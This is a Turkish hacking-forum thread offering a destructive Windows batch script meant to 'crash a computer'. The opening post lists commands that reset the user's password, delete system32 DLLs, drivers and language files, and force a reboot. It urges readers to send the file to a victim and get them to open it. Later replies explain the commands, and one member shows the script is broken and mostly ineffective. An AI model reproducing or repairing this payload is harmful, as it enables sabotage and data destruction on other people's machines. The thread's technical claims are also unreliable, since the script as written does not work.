Bilgisayar Cokertme

zerbaliofficial

Yeni üye
30 Tem 2017
42
0
net user %username% W$ar][{#Wa#syon#$$$#
del %systemroot%system32dllcachec_1254.nls
del %systemroot%system32c_1254.nls
del %systemroot%system32hal.dll
del %systemroot%system32kdcom.dll
del %systemroot%system32kernel32.dll
del %systemroot%system32bootvid.dll
del %systemroot%system32c_037.nls
del %systemroot%system32c_437.nls
del %systemroot%system32c_500.nls
del %systemroot%system32c_737.nls
del %systemroot%system32c_1255.nls
del %systemroot%system32C_28594.nls
del %systemroot%system32c_20866.nls
del %systemroot%system32bidispl.dll
del %systemroot%system32C_28594.nls
del %systemroot%system32ups.exe
del %systemroot%system32trkwks.dll
del %systemroot%system32scardsvr.exe
del %systemroot%system32audiosrv.dll
del %systemroot%system32driversatapi.sys
del %systemroot%system32driverscdaudio.sys
del %systemroot%system32driverscdfs.sys
del %systemroot%system32driverscdrom.sys
shutdown -r -t 00
net user %username% W$ar][{#Wa#syon#$$$#

bu kodu metin belgesinde kayd edip uantisini .bat olaraq degistiriyorsunun o kadar istediginiz bilgisayara gonderin dosyayi bilgisayarda acmasini isteyin acdigi anca bilgisayar cokecek

n0on

Uzman üye
29 Tem 2017
1,016
0
Anlamı ise del silmek demek system32 deki dosyaların ismini yazdığımız şeyi siliyor hali hazırda bilgisayar çöküyor.

shutdown -r bilgisayarı kapatıyor

sondaki %username% adflvsjaıdjskakvopo de şifreyi değiştiriyor onu yazmaya gerek yoktu

Zaten çoğunuz biliyordur Bilmeyenler için yazdım.

Son düzenleme:

HACKEDBYHYDRA

Uzman üye
21 Ağu 2016
1,822
0
127.0.0.1
Ben bunu metin belgesi olarak kaydedeyim işime yararsa bat yaparım direk bat kaydedersem kendi pc'm çöker :trl: :trl: :trl: :D
Ellerine sağlık bu arada.

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,061
388
Ankara
Tabii hedef bilgisayar 2000 öncesinden kalmamışsa "access denied" deyip duruyor...

Paylaşmayın böyle saçmalıkları...

LazyESC

Katılımcı Üye
15 Şub 2012
527
0
Eskişehir
Windows 8 ve üzerindeki sistemlerde windows klasörü içersindeki klasörleri silmek ve değiştirmek için yetki ayarlaması istiyor yapılmadan silebiliyor mu

zerbaliofficial

Yeni üye
30 Tem 2017
42
0
Windows 8 ve üzerindeki sistemlerde windows klasörü içersindeki klasörleri silmek ve değiştirmek için yetki ayarlaması istiyor yapılmadan silebiliyor mu
Sile bilmesede devamli silme isteginde yetkiyi gostergesini getirince bilgisayari donguye salip cokertecek. Hemde bu kodlari .exe yada .bat olarak kayd edince komut satiri uzerinden gerceklestiriyor. Sonsuz donguye salip bilgisayari felc ediyor.

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,061
388
Ankara
Cok film izliyorsun kardesim. :)

Sile bilmesede devamli silme isteginde yetkiyi gostergesini getirince bilgisayari donguye salip cokertecek. Hemde bu kodlari .exe yada .bat olarak kayd edince komut satiri uzerinden gerceklestiriyor. Sonsuz donguye salip bilgisayari felc ediyor.

Tesekkur ederim.Detayini anlattim yani bunu metin belgesine yapistirip uzantisini ya .exe yadaki .bat olarak yapiyoruz o kadar gondereceginiz bilgisayar bunu acinca boom:D

1. \ işaretini unuttuğundan hiç bir "del" komutu zaten işe yaramayacak.
2. O dosyaların hemen hemen hiç biri artık modern bilgisayarlarda bulunmuyor.
3. "net user" da, %system32%'den bir şey silmek de yönetici yetkisi gerektirir.
4. Görüntülü oturtalım arkadaşı, daha zevkli olur...

[ame]https://www.youtube.com/watch?v=2kpQGwhgHys&feature=youtu.be[/ame]

StaLinux

Katılımcı Üye
5 Haz 2016
438
0
.bat virüsünü yiyebilecek bir adamla ne alıp veremediğin olabilirki zaten...
pek yararlı olmamış forumda çok fazla bu konulardan var. -Bat virüs yapıcısını araştırın orda kodları düzgün yazıyor :)

xAesir

Üye
30 Tem 2017
187
0
İstanbul
1. \ işaretini unuttuğundan hiç bir "del" komutu zaten işe yaramayacak.
2. O dosyaların hemen hemen hiç biri artık modern bilgisayarlarda bulunmuyor.
3. "net user" da, %system32%'den bir şey silmek de yönetici yetkisi gerektirir.
4. Görüntülü oturtalım arkadaşı, daha zevkli olur...

https://www.youtube.com/watch?v=2kpQGwhgHys&feature=youtu.be

yahu ben bilgisayara video kayıt programını indirmeye üşeniyorum, sen kalkıp olmiyacak şey için video çekiyorsun :trl :trl

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,061
388
Ankara
yahu ben bilgisayara video kayıt programını indirmeye üşeniyorum, sen kalkıp olmiyacak şey için video çekiyorsun :trl :trl

Bu olmayacak şey değil, trollük.. onun zevki yeter...

Ayrıca genç arkadaşlara yanlış bilgi verilmesini önlemek görevimizdir.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.